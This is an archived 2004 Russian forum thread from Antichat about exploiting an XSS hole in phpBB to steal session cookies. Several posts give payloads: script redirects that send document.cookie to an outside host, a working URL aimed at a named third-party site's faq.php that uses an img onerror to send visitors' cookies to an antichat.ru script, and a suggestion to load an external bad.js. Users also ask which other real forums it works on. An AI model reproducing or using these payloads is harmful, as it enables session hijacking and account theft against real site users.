ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.10.2004, 00:46
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
Smile

Решил попробовать взломать свой форум на phpBB с помощью xss-уязвимости (для sql-баги, нужно чтобы была возможность пересылать приваты, а это есть не везде). Долго мучался, но так нефига и не получилось. Если вводить так(брал любую описанную xss-багу):<script&gt;document.location=&quot;http://www.asd.as/as.php?xack=&quot;+docu...lt;/script&gt;, то скрипт добавляет слеши перед каждой ковычкой. А если так (в 10'ой кодировке):<script&gt;document.location&a mp;#61&amp;#34www.asd.as/as.php?xack&amp;#61&amp;#34&amp;#43document.cookie &lt;/script&gt;, то строка выполняется только до &quot;<script&gt;document.location=&quot; и соответственно нарушается синтаксиc штмл, и весь остальной код не воспроизводится. Объясните где логика?
PS Кто нибудь слышал про движок textus? Есть ли там уязвимости?
 
Ответить с цитированием

  #2  
Старый 30.10.2004, 01:14
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

Я что-то не понял, каким образом ты вставляешь этот скрипт в форум ?
 
Ответить с цитированием

  #3  
Старый 30.10.2004, 18:07
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию

 
Ответить с цитированием

  #4  
Старый 31.10.2004, 00:34
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

Вот так работает

http://www.spb-mebel.ru/phpbb/faq.php?faq[0][0]=te):<img src="" sss=http://antichat.ru/cgi-bin/s.jpg? onerror=document.location=this.sss%2Bdocument.cook ie>st&amp;faq[0][1]=test

Последний раз редактировалось Algol; 30.11.2004 в 13:22..
 
Ответить с цитированием

  #5  
Старый 02.11.2004, 21:13
CoTT
Новичок
Регистрация: 16.09.2004
Сообщений: 21
Провел на форуме:
0

Репутация: 0
По умолчанию

а в каких версиях PHPbb это работает?
вот тут: www.rimspb.ru/forum/ например не пашет...
 
Ответить с цитированием

  #6  
Старый 07.11.2004, 01:10
Pengo
Познающий
Регистрация: 13.09.2004
Сообщений: 46
Провел на форуме:
4001

Репутация: 0
По умолчанию

 
Ответить с цитированием

  #7  
Старый 25.11.2004, 13:57
PEPSICOLA
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме:
5619724

Репутация: 2944


По умолчанию

Куда этот пингвин пропал.... Наверно обиделся что я его рэпером называл =)))
 
Ответить с цитированием

  #8  
Старый 25.11.2004, 20:52
ля-ля
Новичок
Регистрация: 23.08.2004
Сообщений: 16
Провел на форуме:
2959

Репутация: 4
Smile

Цитата:
Сообщение от PEPSICOLA  
Куда этот пингвин пропал.... Наверно обиделся что я его рэпером называл =)))
А при чём тут он??????
 
Ответить с цитированием

  #9  
Старый 26.11.2004, 03:04
PEPSICOLA
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме:
5619724

Репутация: 2944


Unhappy

Мне его так не хватает... ...
 
Ответить с цитированием

  #10  
Старый 24.12.2004, 16:32
TaskFall
Новичок
Регистрация: 24.12.2004
Сообщений: 2
Провел на форуме:
3851

Репутация: 0
По умолчанию

Я тоже с этим мучился - без кавычек - кукисы не спереть =(
я решил это так:
Просто выполнялся скрипт не из url'а, а из файла faq[0][0]=<script src=\localhost/bad.js></script>
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ